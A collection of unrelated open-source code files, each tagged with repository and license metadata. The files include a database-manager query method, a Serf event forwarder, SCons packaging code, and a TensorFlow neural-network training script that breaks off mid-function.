"""Retrieves rows from the table with the given filter applied"""
comment = None
order = []
if simplify is None:
simplify = False
if simplify:
comment = connection.comment(self.name)
order = comment.order
builder = QueryBuilder(
connection,
self,
filter_=filter_,
order=order,
limit=limit,
simplify=simplify)
mapper = None
if simplify:
mapper = SimplifyMapper(
self,
comment=create_comment(
self,
comment,
builder.counter,
builder.aliases,
None))
try:
result = connection.queryall(
builder.build(),
mapper=mapper)
except (DataError, ProgrammingError, UnknownColumnException,
UnicodeEncodeError): # pragma: no cover
raise
except BaseException as e: # pragma: no cover
logger.error(e, exc_info=1) # pragma: no cover
import sys # pragma: no cover
# pylint: disable=raising-non-exception
raise type(e), type(e)(
u'{} (check comment on table {})'.format(e.message, self.name)
), sys.exc_info()[2] # pragma: no cover
return map(lambda row: Row(self, row), result)
def foreign_keys(self):
return self._fks
def foreign_key(self, name):
if name in self._fks:
return self._fks[name]
return None
def set_foreign_key(self, name, value):
self._fks[name] = value
def title(self):
return self.name
def subtitle(self):
if self.owner and self.size:
return u'Owner: %s (%s)' % (self.owner, self.size)
return u'Table'
|
resamsel/dbmanagr
|
src/dbmanagr/model/table.py
|
Python
|
gpl-3.0
| 5,345
|
#!/usr/bin/python
import os
import socket
import logging
import sys
import requests
if __name__ == '__main__':
if not os.path.exists('/tmp/logging'):
os.mkdir('/tmp/logging')
my_ip = socket.gethostbyname(socket.gethostname())
logging.basicConfig(filename='/tmp/logging/%s/event_handler.log'
% my_ip, level=logging.DEBUG)
payload = sys.stdin.read()
try:
event = os.environ["SERF_USER_EVENT"]
except KeyError:
try:
event = os.environ["SERF_EVENT"]
except KeyError:
event = "NO_EVENT_FOUND"
logging.info("Sending %s %s " % (event, payload))
if len(payload) > 0:
r = requests.put("http://127.0.0.1:5000/send/%s" % event, data=payload)
else:
r = requests.put("http://127.0.0.1:5000/send/%s" % event, data="")
|
pinireznik/antitude
|
agents/ui/UIEventHandler.py
|
Python
|
apache-2.0
| 839
|
/usr/share/pyshared/gwibber/lib/gtk/widgets.py
|
Alberto-Beralix/Beralix
|
i386-squashfs-root/usr/lib/pymodules/python2.7/gwibber/lib/gtk/widgets.py
|
Python
|
gpl-3.0
| 46
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""This is task 3 its jelly time"""
from peanut import BUTTER
JELLY = BUTTER
|
mjmeyer2013/is210-week-05-warmup
|
task_03.py
|
Python
|
mpl-2.0
| 126
|
"""SCons.Tool.Packaging
SCons Packaging Tool.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/packaging/__init__.py 3842 2008/12/20 22:59:52 scons"
import SCons.Environment
from SCons.Variables import *
from SCons.Errors import *
from SCons.Util import is_List, make_path_relative
from SCons.Warnings import warn, Warning
import os, imp
import SCons.Defaults
__all__ = [ 'src_targz', 'src_tarbz2', 'src_zip', 'tarbz2', 'targz', 'zip', 'rpm', 'msi', 'ipk' ]
#
# Utility and Builder function
#
def Tag(env, target, source, *more_tags, **kw_tags):
""" Tag a file with the given arguments, just sets the accordingly named
attribute on the file object.
TODO: FIXME
"""
if not target:
target=source
first_tag=None
else:
first_tag=source
if first_tag:
kw_tags[first_tag[0]] = ''
if len(kw_tags) == 0 and len(more_tags) == 0:
raise UserError, "No tags given."
# XXX: sanity checks
for x in more_tags:
kw_tags[x] = ''
if not SCons.Util.is_List(target):
target=[target]
else:
# hmm, sometimes the target list, is a list of a list
# make sure it is flattened prior to processing.
# TODO: perhaps some bug ?!?
target=env.Flatten(target)
for t in target:
for (k,v) in kw_tags.items():
# all file tags have to start with PACKAGING_, so we can later
# differentiate between "normal" object attributes and the
# packaging attributes. As the user should not be bothered with
# that, the prefix will be added here if missing.
#if not k.startswith('PACKAGING_'):
if k[:10] != 'PACKAGING_':
k='PACKAGING_'+k
setattr(t, k, v)
def Package(env, target=None, source=None, **kw):
""" Entry point for the package tool.
"""
# check if we need to find the source files ourself
if not source:
source = env.FindInstalledFiles()
if len(source)==0:
raise UserError, "No source for Package() given"
# decide which types of packages shall be built. Can be defined through
# four mechanisms: command line argument, keyword argument,
# environment argument and default selection( zip or tar.gz ) in that
# order.
try: kw['PACKAGETYPE']=env['PACKAGETYPE']
except KeyError: pass
if not kw.get('PACKAGETYPE'):
from SCons.Script import GetOption
kw['PACKAGETYPE'] = GetOption('package_type')
if kw['PACKAGETYPE'] == None:
if env['BUILDERS'].has_key('Tar'):
kw['PACKAGETYPE']='targz'
elif env['BUILDERS'].has_key('Zip'):
kw['PACKAGETYPE']='zip'
else:
raise UserError, "No type for Package() given"
PACKAGETYPE=kw['PACKAGETYPE']
if not is_List(PACKAGETYPE):
PACKAGETYPE=string.split(PACKAGETYPE, ',')
# load the needed packagers.
def load_packager(type):
try:
file,path,desc=imp.find_module(type, __path__)
return imp.load_module(type, file, path, desc)
except ImportError, e:
raise EnvironmentError("packager %s not available: %s"%(type,str(e)))
packagers=map(load_packager, PACKAGETYPE)
# set up targets and the PACKAGEROOT
try:
# fill up the target list with a default target name until the PACKAGETYPE
# list is of the same size as the target list.
if not target: target = []
size_diff = len(PACKAGETYPE)-len(target)
default_name = "%(NAME)s-%(VERSION)s"
if size_diff>0:
default_target = default_name%kw
target.extend( [default_target]*size_diff )
if not kw.has_key('PACKAGEROOT'):
kw['PACKAGEROOT'] = default_name%kw
except KeyError, e:
raise SCons.Errors.UserError( "Missing Packagetag '%s'"%e.args[0] )
# setup the source files
source=env.arg2nodes(source, env.fs.Entry)
# call the packager to setup the dependencies.
targets=[]
try:
for packager in packagers:
t=[target.pop(0)]
t=apply(packager.package, [env,t,source], kw)
targets.extend(t)
assert( len(target) == 0 )
except KeyError, e:
raise SCons.Errors.UserError( "Missing Packagetag '%s' for %s packager"\
% (e.args[0],packager.__name__) )
except TypeError, e:
# this exception means that a needed argument for the packager is
# missing. As our packagers get their "tags" as named function
# arguments we need to find out which one is missing.
from inspect import getargspec
args,varargs,varkw,defaults=getargspec(packager.package)
if defaults!=None:
args=args[:-len(defaults)] # throw away arguments with default values
map(args.remove, 'env target source'.split())
# now remove any args for which we have a value in kw.
#args=[x for x in args if not kw.has_key(x)]
args=filter(lambda x, kw=kw: not kw.has_key(x), args)
if len(args)==0:
raise # must be a different error, so reraise
elif len(args)==1:
raise SCons.Errors.UserError( "Missing Packagetag '%s' for %s packager"\
% (args[0],packager.__name__) )
else:
raise SCons.Errors.UserError( "Missing Packagetags '%s' for %s packager"\
% (", ".join(args),packager.__name__) )
target=env.arg2nodes(target, env.fs.Entry)
targets.extend(env.Alias( 'package', targets ))
return targets
#
# SCons tool initialization functions
#
added = None
def generate(env):
from SCons.Script import AddOption
global added
if not added:
added = 1
AddOption('--package-type',
dest='package_type',
default=None,
type="string",
action="store",
help='The type of package to create.')
try:
env['BUILDERS']['Package']
env['BUILDERS']['Tag']
except KeyError:
env['BUILDERS']['Package'] = Package
env['BUILDERS']['Tag'] = Tag
def exists(env):
return 1
# XXX
def options(opts):
opts.AddVariables(
EnumVariable( 'PACKAGETYPE',
'the type of package to create.',
None, allowed_values=map( str, __all__ ),
ignorecase=2
)
)
#
# Internal utility functions
#
def copy_attr(f1, f2):
""" copies the special packaging file attributes from f1 to f2.
"""
#pattrs = [x for x in dir(f1) if not hasattr(f2, x) and\
# x.startswith('PACKAGING_')]
copyit = lambda x, f2=f2: not hasattr(f2, x) and x[:10] == 'PACKAGING_'
pattrs = filter(copyit, dir(f1))
for attr in pattrs:
setattr(f2, attr, getattr(f1, attr))
def putintopackageroot(target, source, env, pkgroot, honor_install_location=1):
""" Uses the CopyAs builder to copy all source files to the directory given
in pkgroot.
If honor_install_location is set and the copied source file has an
PACKAGING_INSTALL_LOCATION attribute, the PACKAGING_INSTALL_LOCATION is
used as the new name of the source file under pkgroot.
The source file will not be copied if it is already under the the pkgroot
directory.
All attributes of the source file will be copied to the new file.
"""
# make sure the packageroot is a Dir object.
if SCons.Util.is_String(pkgroot): pkgroot=env.Dir(pkgroot)
if not SCons.Util.is_List(source): source=[source]
new_source = []
for file in source:
if SCons.Util.is_String(file): file = env.File(file)
if file.is_under(pkgroot):
new_source.append(file)
else:
if hasattr(file, 'PACKAGING_INSTALL_LOCATION') and\
honor_install_location:
new_name=make_path_relative(file.PACKAGING_INSTALL_LOCATION)
else:
new_name=make_path_relative(file.get_path())
new_file=pkgroot.File(new_name)
new_file=env.CopyAs(new_file, file)[0]
copy_attr(file, new_file)
new_source.append(new_file)
return (target, new_source)
def stripinstallbuilder(target, source, env):
""" strips the install builder action from the source list and stores
the final installation location as the "PACKAGING_INSTALL_LOCATION" of
the source of the source file. This effectively removes the final installed
files from the source list while remembering the installation location.
It also warns about files which have no install builder attached.
"""
def has_no_install_location(file):
return not (file.has_builder() and\
hasattr(file.builder, 'name') and\
(file.builder.name=="InstallBuilder" or\
file.builder.name=="InstallAsBuilder"))
if len(filter(has_no_install_location, source)):
warn(Warning, "there are files to package which have no\
InstallBuilder attached, this might lead to irreproducible packages")
n_source=[]
for s in source:
if has_no_install_location(s):
n_source.append(s)
else:
for ss in s.sources:
n_source.append(ss)
copy_attr(s, ss)
setattr(ss, 'PACKAGING_INSTALL_LOCATION', s.get_path())
return (target, n_source)
|
carlos-lopez-garces/mapnik-trunk
|
scons/scons-local-1.2.0/SCons/Tool/packaging/__init__.py
|
Python
|
lgpl-2.1
| 10,691
|
# -*- coding: utf-8 -*-
# (c) 2015 Oihane Crucelaegui - AvanzOSC
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html
from . import test_quality_control_stock
|
alhashash/odoomrp-wip
|
quality_control_stock/tests/__init__.py
|
Python
|
agpl-3.0
| 172
|
# coding: utf-8
# ## vanilla-DNN-ema
# Author: Justin Tan
#
# Vanilla neural network. Do anything from MNIST to signal classification.
#
# Update 20/03: Added batch normalization, TensorBoard visualization
#
# Update 19/06: Added cosine annealing, exponential moving average
#
# To-do: Update to TF 1.2, fused batch norm
# In[1]:
import tensorflow as tf
import numpy as np
import pandas as pd
import time, os
class config(object):
# Set network parameters
mode = 'kst'
channel = 'rho0'
n_features = 100
keep_prob = 0.8
num_epochs = 256
batch_size = 256
# n_layers = 3
# hidden_layer_nodes = [1024, 1024, 512]
n_layers = 12
hidden_layer_nodes = [1024, 1024, 1024, 1024, 512, 512, 512, 512, 256, 256, 256, 256]
ema_decay = 0.999
learning_rate = 8e-5
cycles = 8 # Number of annealing cycles
n_classes = 2
builder = 'selu'
class directories(object):
tensorboard = 'tensorboard'
checkpoints = 'checkpoints'
architecture = '{} - {} | Layers: {} | Dropout: {} | Base LR: {} | Epochs: {}'.format(
config.channel, config.mode, config.n_layers, config.keep_prob, config.learning_rate, config.num_epochs)
class reader():
# Iterates over data and returns batches
def __init__(self, df):
self.df = df
self.batch_size = config.batch_size
self.steps_per_epoch = len(df) // config.batch_size
self.epochs = 0
self.proceed = True
self.shuffle()
def shuffle(self):
self.df = self.df.sample(frac=1).reset_index(drop=True)
self.df_X = self.df.drop('labels', axis = 1)
self.df_y = self.df['labels']
self.pointer = 0
def next_batch(self, batch_size):
if self.pointer + 1 >= self.steps_per_epoch:
inputs = self.df_X.iloc[self.pointer*batch_size:]
targets = self.df_y.iloc[self.pointer*batch_size:]
self.epochs += 1
self.shuffle()
self.proceed = False
inputs = self.df_X.iloc[self.pointer*batch_size:(self.pointer+1)*batch_size]
targets = self.df_y.iloc[self.pointer*batch_size:(self.pointer+1)*batch_size]
self.pointer += 1
return inputs, targets
# ### Functions for graph construction
# In[2]:
# SELU helper functions
import numbers
from tensorflow.contrib import layers
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import array_ops
from tensorflow.python.layers import utils
""" When using SELUs you have to keep the following in mind:
# (1) scale inputs to zero mean and unit variance
# (2) use SELUs
# (3) initialize weights with stddev sqrt(1/n)
# (4) use SELU dropout
"""
# (1) scale inputs to zero mean and unit variance
# (2) use SELUs
def selu(x):
with ops.name_scope('elu') as scope:
alpha = 1.6732632423543772848170429916717
scale = 1.0507009873554804934193349852946
return scale*tf.where(x>=0.0, x, alpha*tf.nn.elu(x))
# (3) initialize weights with stddev sqrt(1/n)
SELU_initializer = layers.variance_scaling_initializer(factor=1.0, mode='FAN_IN')
# (4) use this dropout
def dropout_selu(x, rate, alpha= -1.7580993408473766, fixedPointMean=0.0, fixedPointVar=1.0,
noise_shape=None, seed=None, name=None, training=False):
"""Dropout to a value with rescaling."""
def dropout_selu_impl(x, rate, alpha, noise_shape, seed, name):
keep_prob = 1.0 - rate
x = ops.convert_to_tensor(x, name="x")
if isinstance(keep_prob, numbers.Real) and not 0 < keep_prob <= 1:
raise ValueError("keep_prob must be a scalar tensor or a float in the "
"range (0, 1], got %g" % keep_prob)
keep_prob = ops.convert_to_tensor(keep_prob, dtype=x.dtype, name="keep_prob")
keep_prob.get_shape().assert_is_compatible_with(tensor_shape.scalar())
alpha = ops.convert_to_tensor(alpha, dtype=x.dtype, name="alpha")
alpha.get_shape().assert_is_compatible_with(tensor_shape.scalar())
if tensor_util.constant_value(keep_prob) == 1:
return x
noise_shape = noise_shape if noise_shape is not None else array_ops.shape(x)
random_tensor = keep_prob
random_tensor += random_ops.random_uniform(noise_shape, seed=seed, dtype=x.dtype)
binary_tensor = math_ops.floor(random_tensor)
ret = x * binary_tensor + alpha * (1-binary_tensor)
a = math_ops.sqrt(fixedPointVar / (keep_prob *((1-keep_prob) * math_ops.pow(alpha-fixedPointMean,2) + fixedPointVar)))
b = fixedPointMean - a * (keep_prob * fixedPointMean + (1 - keep_prob) * alpha)
ret = a * ret + b
ret.set_shape(x.get_shape())
return ret
with ops.name_scope(name, "dropout", [x]) as name:
return utils.smart_cond(training,
lambda: dropout_selu_impl(x, rate, alpha, noise_shape, seed, name),
lambda: array_ops.identity(x))
# In[3]:
def load_data(file_name, test_size = 0.05):
from sklearn.model_selection import train_test_split
df = pd.read_hdf(file_name, 'df')
df_X_train, df_X_test, df_y_train, df_y_test = train_test_split(df.drop('labels', axis = 1),
df['labels'], test_size = test_size, random_state=42)
return df_X_train, df_X_test, df_y_train, df_y_test
def save_summary(config, delta_t, train_acc, test_acc, test_auc):
import json
summary = {
'Channel': config.channel,
'Mode': config.mode,
'Timestamp': time.strftime('%c'),
'Arch': config.builder,
'Layers': config.n_layers,
'Batch_size': config.batch_size,
'Dropout': config.keep_prob,
'Epochs': config.num_epochs,
'Time': delta_t,
'Final train acc': train_acc,
'Final test acc': test_acc,
'Final test AUC': test_auc
}
# Writing JSON data
if os.path.isfile('vdnn_summary.json'):
with open('vdnn_summary.json.', 'r+') as f:
new = json.load(f)
new.append(summary)
with open('vdnn_summary.json', 'w') as f:
json.dump(new, f, indent = 4)
else:
with open('vdnn_summary.json', 'w') as f:
json.dump([summary], f, indent = 4)
def layer_weights(shape, initializer = tf.contrib.layers.xavier_initializer()):
# Return weight tensor of given shape using Xavier initialization
W = tf.get_variable("weights", shape = shape, initializer=initializer)
return W
def layer_biases(shape, init_value = 0.0):
# Return bias tensor of given shape with small initialized constant value
b = tf.get_variable("biases", shape = shape, initializer = tf.constant_initializer(init_value))
return b
def hidden_layer_ops(x, shape, name, keep_prob, activation=tf.nn.relu):
# Add operations to graph to construct hidden layers
with tf.variable_scope(name) as scope:
# scope.reuse_variables() # otherwise tf.get_variable() checks that already existing vars are not shared by accident
weights = layer_weights(shape = shape)
biases = layer_biases(shape = [shape[1]])
# Apply non-linearity. Default is ReLU
actv = activation(tf.matmul(x, weights) + biases)
layer_output = tf.nn.dropout(actv, keep_prob)
return layer_output
def hidden_SELU_ops(x, shape, name, keep_prob, phase = True):
# Add operations to graph to construct hidden layers
with tf.variable_scope(name) as scope:
# scope.reuse_variables() # otherwise tf.get_variable() checks that already existing vars are not shared by accident
weights = layer_weights(shape = shape, initializer = SELU_initializer)
biases = layer_biases(shape = [shape[1]])
# Apply non-linearity. Default is ReLU
actv = selu(tf.add(tf.matmul(x, weights), biases))
layer_output = dropout_selu(actv, rate = 1 - keep_prob, training = phase)
return layer_output
def build_SELU_network2(x, n_layers, hidden_layer_nodes, keep_prob, training_phase):
shape = [config.n_features, 1024]
name = 'w1'
with tf.variable_scope(name) as scope:
w1 = layer_weights(shape = shape, initializer = SELU_initializer)
b1 = layer_biases(shape = [shape[1]])
# Apply non-linearity. Default is ReLU
a1 = selu(tf.add(tf.matmul(x, w1), b1))
h1 = dropout_selu(a1, rate = 1 - keep_prob, training = training_phase)
shape = [1024, 1024]
name = 'w2'
with tf.variable_scope(name) as scope:
w2 = layer_weights(shape = shape, initializer = SELU_initializer)
b2 = layer_biases(shape = [shape[1]])
# Apply non-linearity. Default is ReLU
a2 = selu(tf.add(tf.matmul(h1, w2), b2))
h2 = dropout_selu(a2, rate = 1 - keep_prob, training = training_phase)
name = 'w3'
shape = [1024, 512]
with tf.variable_scope(name) as scope:
w3 = layer_weights(shape = shape, initializer = SELU_initializer)
b3 = layer_biases(shape = [shape[1]])
# Apply non-linearity. Default is ReLU
a3 = selu(tf.add(tf.matmul(h2, w3), b3))
h3 = dropout_selu(a3, rate = 1 - keep_prob, training = training_phase)
shape = [512, 2]
name = 'w4'
with tf.variable_scope(name) as scope:
w4 = layer_weights(shape = shape, initializer = SELU_initializer)
b4 = layer_biases(shape = [shape[1]])
# Apply non-linearity. Default is ReLU
readout = tf.add(tf.matmul(h3, w4), b4)
return readout
def readout_ops(x, shape, name, initializer = tf.contrib.layers.xavier_initializer()):
# Don't apply non-linearity, dropout on output layer
with tf.variable_scope(name) as scope:
weights = layer_weights(shape = shape, initializer = initializer)
biases = layer_biases(shape = [shape[1]])
layer_output = tf.matmul(x, weights) + biases
return layer_output
def BN_layer_ops(x, shape, name, keep_prob, phase, activation=tf.nn.relu):
# High-level implementation of BN
with tf.variable_scope(name) as scope:
# scope.reuse_variables() # otherwise tf.get_variable() checks that already existing vars are not shared by accident
weights = layer_weights(shape = shape)
biases = layer_biases(shape = [shape[1]])
z_BN = tf.matmul(x, weights) + biases
# Place BN transform before non-linearity - update to TF 1.2!
theta_BN = tf.contrib.layers.batch_norm(z_BN, center=True, scale=True,is_training=phase,
decay=0.99, zero_debias_moving_mean=True, scope='bn', fused = True)
BN_actv = activation(theta_BN)
BN_layer_output = tf.nn.dropout(BN_actv, keep_prob)
return BN_layer_output
def SELU_BN_layer_ops(x, shape, name, keep_prob, phase):
# High-level implementation of BN
with tf.variable_scope(name) as scope:
# scope.reuse_variables() # otherwise tf.get_variable() checks that already existing vars are not shared by accident
weights = layer_weights(shape = shape)
biases = layer_biases(shape = [shape[1]])
z_BN = tf.matmul(x, weights) + biases
# Place BN transform before non-linearity - update to TF 1.2!
theta_BN = tf.contrib.layers.batch_norm(z_BN, center=True, scale=True,is_training=phase,
decay=0.99, zero_debias_moving_mean=True, scope='bn', fused = True)
BN_actv = selu(theta_BN)
BN_layer_output = dropout_selu(BN_actv, rate = 1 - keep_prob, training = phase)
return BN_layer_output
def network_builder(x, n_layers, hidden_layer_nodes, keep_prob, training_phase):
assert n_layers == len(hidden_layer_nodes), 'Specified layer nodes and number of layers do not correspond.'
layers = [x]
if config.builder == 'bn':
print('Building ReLU + Batch-norm architecture')
builder = BN_layer_ops
elif config.builder == 'selu':
print('Building SELU architecture')
builder = hidden_SELU_ops
elif config.builder == 'selu-bn':
print('Building SELU + Batch-norm architecture')
builder = SELU_BN_layer_ops
else:
print('Default architecture: SELU')
builder = hidden_SELU_ops
with tf.variable_scope('hidden_layers') as scope:
hidden_1 = builder(x, shape = [config.n_features, hidden_layer_nodes[0]], name = 'hidden0',
keep_prob = keep_prob, phase = training_phase)
layers.append(hidden_1)
for n in range(0,n_layers-1):
hidden_n = builder(layers[-1], shape = [hidden_layer_nodes[n], hidden_layer_nodes[n+1]], name = 'hidden{}'.format(n+1),
keep_prob = keep_prob, phase = training_phase)
layers.append(hidden_n)
readout = readout_ops(layers[-1], shape = [hidden_layer_nodes[-1], config.n_classes], name = 'readout', initializer = SELU_initializer)
return readout
def build_SELU_network(x, n_layers, hidden_layer_nodes, keep_prob, training_phase):
assert n_layers == len(hidden_layer_nodes), 'Specified layer nodes and number of layers do not correspond.'
layers = [x]
with tf.variable_scope('SELU_layers') as scope:
hidden_1 = hidden_SELU_ops(x, shape = [config.n_features, hidden_layer_nodes[0]], name = 'SELUhidden0',
keep_prob = keep_prob, phase = training_phase)
layers.append(hidden_1)
for n in range(0,n_layers-1):
hidden_n = hidden_SELU_ops(layers[-1], shape = [hidden_layer_nodes[n], hidden_layer_nodes[n+1]], name = 'SELUhidden{}'.format(n+1),
keep_prob = keep_prob, phase = training_phase)
layers.append(hidden_n)
readout = readout_ops(layers[-1], shape = [hidden_layer_nodes[-1], config.n_classes], name = 'readout', initializer = SELU_initializer)
return readout
def build_network(x, n_layers, hidden_layer_nodes, keep_prob, training_phase):
assert n_layers == len(hidden_layer_nodes), 'Specified layer nodes and number of layers do not correspond.'
layers = [x]
with tf.variable_scope('BN_layers') as scope:
hidden_1 = BN_layer_ops(x, shape = [config.n_features, hidden_layer_nodes[0]], name = 'BNhidden0',
keep_prob = keep_prob, phase = training_phase)
layers.append(hidden_1)
for n in range(0,n_layers-1):
hidden_n = BN_layer_ops(layers[-1], shape = [hidden_layer_nodes[n], hidden_layer_nodes[n+1]], name = 'BNhidden{}'.format(n+1),
keep_prob = keep_prob, phase = training_phase)
layers.append(hidden_n)
readout = readout_ops(layers[-1], shape = [hidden_layer_nodes[-1], config.n_classes], name = 'readout')
return readout
def plot_ROC_curve(network_output, y_true, meta = ''):
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.metrics import roc_curve, auc
y_score = network_output[:,1]
# Compute ROC curve, integrate
fpr, tpr, thresholds = roc_curve(y_true, y_score)
roc_auc = auc(fpr, tpr)
plt.figure()
plt.axes([.1,.1,.8,.7])
plt.figtext(.5,.9, r'$\mathrm{Receiver \;Operating \;Characteristic}$', fontsize=15, ha='center')
plt.figtext(.5,.85, meta, fontsize=10,ha='center')
plt.plot(fpr, tpr, color='darkorange',
lw=2, label='ROC (area = %0.2f)' % roc_auc)
plt.plot([0, 1], [0, 1], color='navy', lw=1.0, linestyle='--')
plt.xlim([-0.05, 1.05])
plt.ylim([-0.05, 1.05])
plt.xlabel(r'$\mathrm{False \;Positive \;Rate}$')
plt.ylabel(r'$\mathrm{True \;Positive \;Rate}$')
plt.legend(loc="lower right")
plt.savefig(os.path.join('graphs', '{}_{}_ROC.pdf'.format(config.channel, config.mode)), format='pdf', dpi=1000)
plt.show()
plt.gcf().clear()
def cosine_anneal(initial_lr, t, T, M):
from math import ceil
beta = initial_lr/2 * (np.cos(np.pi* (t % ceil(T/M))/ceil(T/M)) + 1)
return beta
# In[4]:
test_file = '/data/projects/punim0011/jtan/data/dnn/norm_dnn_train_B2rho0gamma_kst.h5'
df_X_train, df_X_test, df_y_train, df_y_test = load_data(test_file)
df_y_train = df_y_train.astype(np.int8)
df_y_test = df_y_test.astype(np.int8)
df_train = pd.concat([df_X_train, df_y_train], axis = 1)
df_test = pd.concat([df_X_test, df_y_test], axis = 1)
config.n_features = df_train.shape[1]-1
config.steps_per_epoch = df_train.shape[0] // config.batch_size
config.T = config.steps_per_epoch*config.num_epochs
readerTrain = reader(df_train)
readerTest = reader(df_test)
# In[5]:
class vanillaDNN():
# Builds the computational graph
def __init__(self, config, training = True, cyclical = False):
self.x = tf.placeholder(tf.float32, shape = [None, config.n_features])
self.y_true = tf.placeholder(tf.int32, shape = None)
self.keep_prob = tf.placeholder(tf.float32)
self.training_phase = tf.placeholder(tf.bool)
if cyclical:
self.beta = tf.placeholder(tf.float32)
else:
self.beta = config.learning_rate
# Anneal learning rate
self.global_step = tf.Variable(0, trainable=False)
# self.beta = tf.train.exponential_decay(config.learning_rate, self.global_step,
# decay_steps = config.steps_per_epoch, decay_rate = config.lr_epoch_decay, staircase=True)
# if config.builder == 'selu':
# print('Using SELU activation')
# self.readout = build_SELU_network(self.x, config.n_layers, config.hidden_layer_nodes, self.keep_prob, self.training_phase)
# self.cross_entropy = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits = self.readout, labels = self.y_true))
# self.opt_op = tf.train.AdamOptimizer(self.beta).minimize(self.cross_entropy, name = 'optimizer',
# global_step = self.global_step)
self.readout = network_builder(self.x, config.n_layers, config.hidden_layer_nodes, self.keep_prob, self.training_phase)
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
self.cross_entropy = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits = self.readout, labels = self.y_true))
with tf.control_dependencies(update_ops):
# Ensures that we execute the update_ops before performing the train_step
self.opt_op = tf.train.AdamOptimizer(self.beta).minimize(self.cross_entropy, name = 'optimizer',
global_step = self.global_step)
ema = tf.train.ExponentialMovingAverage(decay = config.ema_decay, num_updates = self.global_step)
maintain_averages_op = ema.apply(tf.trainable_variables())
with tf.control_dependencies([self.opt_op]):
self.train_op = tf.group(maintain_averages_op)
# Evaluation metrics
self.prediction = tf.nn.softmax(self.readout)
correct_prediction = tf.equal(tf.cast(tf.argmax(self.readout, 1), tf.int32), self.y_true)
self.accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
_, self.auc_op = tf.metrics.auc(predictions = tf.argmax(self.readout,1), labels = self.y_true, num_thresholds = 1024)
tf.summary.scalar('accuracy', self.accuracy)
tf.summary.scalar('auc', self.auc_op)
tf.summary.scalar('learning_rate', self.beta)
tf.summary.scalar('cross_entropy', self.cross_entropy)
self.merge_op = tf.summary.merge_all()
self.train_writer = tf.summary.FileWriter(
os.path.join(directories.tensorboard, 'train_{}'.format(time.strftime('%d-%m_%I:%M'))), graph = tf.get_default_graph())
self.test_writer = tf.summary.FileWriter(
os.path.join(directories.tensorboard, 'test_{}'.format(time.strftime('%d-%m_%I:%M'))))
def predict(self, ckpt, metaGraph = None):
# Restore the moving average version of the learned variables for eval.
variable_averages = tf.train.ExponentialMovingAverage(config.ema_decay)
variables_to_restore = variable_averages.variables_to_restore()
saver = tf.train.Saver(variables_to_restore)
with tf.Session() as sess:
# Initialize variables
init_op = tf.global_variables_initializer()
sess.run(init_op)
sess.run(tf.local_variables_initializer())
start_time = time.time()
assert (ckpt.model_checkpoint_path or metaGraph), 'Missing checkpoint file!'
if metaGraph:
saver = tf.train.import_meta_graph(metaGraph)
saver.restore(sess, os.path.splitext(metaGraph)[0])
print('{} restored.'.format(metaGraph))
else:
saver.restore(sess, ckpt.model_checkpoint_path)
print('{} restored.'.format(ckpt.model_checkpoint_path))
# Make predictions using the trained model
feed_dict_test = {self.x: df_X_test.values, self.y_true: df_y_test.values, self.keep_prob: 1.0, self.training_phase: False}
network_output_test, final_v_acc, final_v_auc = sess.run(
[self.prediction, self.accuracy, self.auc_op], feed_dict = feed_dict_test)
print("Validation accuracy: {:g}\nValidation AUC: {:g}".format(final_v_acc, final_v_auc))
plot_ROC_curve(network_output = network_output_test, y_true = df_y_test.values, meta = architecture)
delta_t = time.time() - start_time
print("Inference complete. Duration: %g s" %(delta_t))
return network_output_test
# In[6]:
def train(config, restore = False):
# Executes training operations
vDNN = vanillaDNN(config, training = True)
start_time = time.time()
v_acc_best = 0.
global_step = 0
saver = tf.train.Saver()
ckpt = tf.train.get_checkpoint_state(directories.checkpoints)
with tf.Session(config=tf.ConfigProto(allow_soft_placement=True, log_device_placement=True)) as sess:
# Initialize variables
init_op = tf.global_variables_initializer()
sess.run(init_op)
if restore and ckpt.model_checkpoint_path:
saver.restore(sess, ckpt.model_checkpoint_path)
print('{} restored.'.format(ckpt.model_checkpoint_path))
for epoch in range(config.num_epochs):
readerTrain.proceed = True
step = 0
# Save every 10 epochs
if epoch % 10 == 0:
save_path = saver.save(sess,
os.path.join(directories.checkpoints,
'vDNN_{}_{}_epoch{}.ckpt'.format(config.mode, config.channel, epoch)),
global_step = epoch)
print('Graph saved to file: {}'.format(save_path))
print('(*) Entering Epoch {} ({:.3f} s)'.format(epoch, time.time() - start_time))
# T_c = epoch % config.T_i
# eta_min, eta_max = sess.run([vDNN.eta_min, vDNN.eta_max])
# eta = eta_min + 1/2*(eta_max - eta_min)*(1+np.cos(np.pi*(T_c/config.T_i)))
# print('Learning rate: {}'.format(eta))
while(readerTrain.proceed):
# Iterate through entire corpus
x_train, y_train = readerTrain.next_batch(config.batch_size)
beta = cosine_anneal(config.learning_rate, global_step, config.T, config.cycles)
feed_dict_train = {vDNN.x: x_train.values, vDNN.y_true: y_train.values,
vDNN.keep_prob: config.keep_prob, vDNN.training_phase: True}#, vDNN.beta: beta}
